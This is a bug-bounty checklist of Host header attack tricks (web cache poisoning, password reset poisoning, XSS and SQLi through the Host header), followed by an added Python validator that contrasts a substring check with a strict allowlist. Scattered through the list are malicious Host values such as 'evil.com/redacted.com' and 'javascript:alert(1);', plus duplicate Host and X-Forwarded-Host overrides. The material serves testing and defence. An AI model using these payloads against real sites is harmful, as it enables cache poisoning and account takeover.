CWE-644: Improper Neutralization of HTTP Headers
Web cache poisoning via ambiguous requests
Password reset poisoning
Add two Host: headers to the request.
Try localhost
Try these headers
If you come across /api.json in any AEM instance during bug hunting, try web cache poisoning via the following headers: Host:, X-Forwarded-Server, X-Forwarded-Host:, or simply try https://localhost/api.json HTTP/1.1
Also try Host: redacted.com.evil.com
Try Host: evil.com/redacted.com https://hackerone.com/reports/317476
Try this too: Host: example.com?.mavenlink.com
Try Host: javascript:alert(1); an XSS payload might result in debugging mode. https://blog.bentkowski.info/2015/04/xss-via-host-header-cse.html
Host header to SQLi: https://blog.usejournal.com/bugbounty-database-hacked-of-indias-popular-sports-company-bypassing-host-header-to-sql-7b9af997c610
Bypass front server restrictions and access to forbidden files and directories through
Add line wrapping
Supply an absolute URL
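The server-side check that the Host values and request tricks listed above are probing for, as an added example that is not part of the original page. It puts a substring check beside an exact-match allowlist; the allowlist, port set and function names are assumptions, and the Host values are the ones from the checklist.

```python
# Added example, not code from the original page.
ALLOWED_HOSTS = {"redacted.com", "www.redacted.com"}  # assumption: names we serve
ALLOWED_PORTS = {"", "80", "443"}                     # assumption: "" means no port
OVERRIDE_HEADERS = {"x-forwarded-host", "x-forwarded-server"}


def weak_check(host, domain="redacted.com"):
    """Flawed pattern: substring match on the expected domain."""
    return domain in host


def strict_check(request_target, headers, trusted_proxy=False):
    """Return (ok, detail). headers: raw (name, value) pairs in wire order."""
    # Line wrapping: an indented header line that a lenient parser kept as-is.
    if any(name[:1] in (" ", "\t") for name, _ in headers):
        return False, "indented header line"
    hosts = [v for n, v in headers if n.lower() == "host"]
    if len(hosts) != 1:
        return False, "need exactly one Host header"
    # An absolute URL in the request line can disagree with the Host header.
    if not request_target.startswith("/"):
        return False, "non origin-form request target"
    # Override headers are only meaningful when set by our own proxy.
    if not trusted_proxy and any(n.lower() in OVERRIDE_HEADERS for n, _ in headers):
        return False, "override header from untrusted peer"
    value = hosts[0].strip().lower()
    host, sep, port = value.rpartition(":")
    if not sep:  # no colon at all: the whole value is the host
        host, port = value, ""
    if host not in ALLOWED_HOSTS or port not in ALLOWED_PORTS:
        return False, "host not in allowlist"
    return True, host


# Host values from the checklist above, placed in constructed requests.
PAGE_VALUES = ["redacted.com.evil.com", "evil.com/redacted.com",
               "javascript:alert(1);", "localhost"]


def compare():
    """Map each value to (weak_check result, strict_check result)."""
    return {v: (weak_check(v), strict_check("/api.json", [("Host", v)])[0])
            for v in PAGE_VALUES}


if __name__ == "__main__":
    for value, (weak, strict) in compare().items():
        print(f"{value!r:32} weak={weak!s:5} strict={strict}")
```

Rejecting override headers outright is the strictest option; stripping them at the edge proxy before the request reaches the application has the same effect.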
Web cache poisoning
Exploiting classic server-side vulnerabilities
Bypassing authentication
Virtual host brute-forcing
Routing-based SSRF
Connection state attacks
PortSwigger